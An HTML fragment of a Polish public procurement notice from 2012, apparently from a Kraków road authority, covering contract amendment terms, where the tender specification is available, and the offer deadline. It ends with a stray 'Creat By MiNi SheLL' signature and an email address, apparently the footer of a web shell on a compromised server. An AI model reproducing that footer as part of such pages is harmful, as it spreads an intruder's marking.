<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 2. Z zastrzeżeniem formy przewidzianej w ust.1 niniejszego paragrafu, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: a). zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b). zmiany kont bankowych, c). wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d). w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona, e). obniżenia wynagrodzenia, o którym mowa §3 ust.1, f). zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu g) zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 08:00, miejsce: w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com